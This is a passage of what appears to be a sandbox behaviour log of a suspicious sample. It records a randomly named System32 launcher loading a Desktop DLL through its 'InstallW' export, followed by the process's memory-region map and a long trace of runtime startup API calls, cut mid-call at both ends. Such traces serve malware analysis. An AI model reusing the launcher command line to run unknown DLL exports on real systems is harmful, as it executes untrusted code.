0x761d0000 [0036.550] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.550] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.550] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.550] GetCurrentThreadId () returned 0xddc Process: id = "25" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f980" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1188 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1189 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1190 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1191 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1192 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1193 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1194 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1195 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1196 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1197 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1198 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1199 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1200 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1201 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1202 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1203 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1204 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1205 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1206 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1207 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1208 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1209 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1210 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1211 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1212 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1213 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1214 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1215 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1216 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1217 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1218 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1219 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1220 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1221 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1222 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1223 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1224 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1225 start_va = 0x10f0000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 1226 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1227 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1228 start_va = 0x1200000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 56 os_tid = 0xb80 [0032.667] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa24 | out: lpSystemTimeAsFileTime=0x30fa24*(dwLowDateTime=0xe1328d30, dwHighDateTime=0x1d3dfba)) [0032.667] GetCurrentProcessId () returned 0xb7c [0032.667] GetCurrentThreadId () returned 0xb80 [0032.667] GetTickCount () returned 0x1752f [0032.667] QueryPerformanceCounter (in: lpPerformanceCount=0x30fa1c | out: lpPerformanceCount=0x30fa1c*=364621968) returned 1 [0032.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.668] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.669] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.669] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.669] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.669] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.669] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.670] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.670] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.670] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.670] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.670] GetCurrentThreadId () returned 0xb80 [0032.670] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"1\"" [0032.670] GetEnvironmentStringsW () returned 0x1278b8* [0032.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x11809f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.671] FreeEnvironmentStringsW (penv=0x1278b8) returned 1 [0032.671] GetStartupInfoA (in: lpStartupInfo=0x30f974 | out: lpStartupInfo=0x30f974*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.671] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.671] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.671] SetHandleCount (uNumber=0x20) returned 0x20 [0032.671] GetLastError () returned 0x0 [0032.671] SetLastError (dwErrCode=0x0) [0032.671] GetLastError () returned 0x0 [0032.671] SetLastError (dwErrCode=0x0) [0032.671] GetLastError () returned 0x0 [0032.671] SetLastError (dwErrCode=0x0) [0032.671] GetACP () returned 0x4e4 [0032.671] GetLastError () returned 0x0 [0032.671] SetLastError (dwErrCode=0x0) [0032.671] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.671] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f954 | out: lpCPInfo=0x30f954) returned 1 [0032.671] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f420 | out: lpCPInfo=0x30f420) returned 1 [0032.671] GetLastError () returned 0x0 [0032.671] SetLastError (dwErrCode=0x0) [0032.671] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x30f3b0 | out: lpCharType=0x30f3b0) returned 1 [0032.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x30f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.671] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x30f434 | out: lpCharType=0x30f434) returned 1 [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x30f168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā") returned 256 [0032.672] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.672] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā", cchSrc=256, lpDestStr=0x30ef58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x30f734, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿq\x06~ôlù0", lpUsedDefaultChar=0x0) returned 256 [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f834, cbMultiByte=256, lpWideCharStr=0x30f188, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā") returned 256 [0032.672] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.672] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⺼矲狰Ā", cchSrc=256, lpDestStr=0x30ef78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x30f634, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 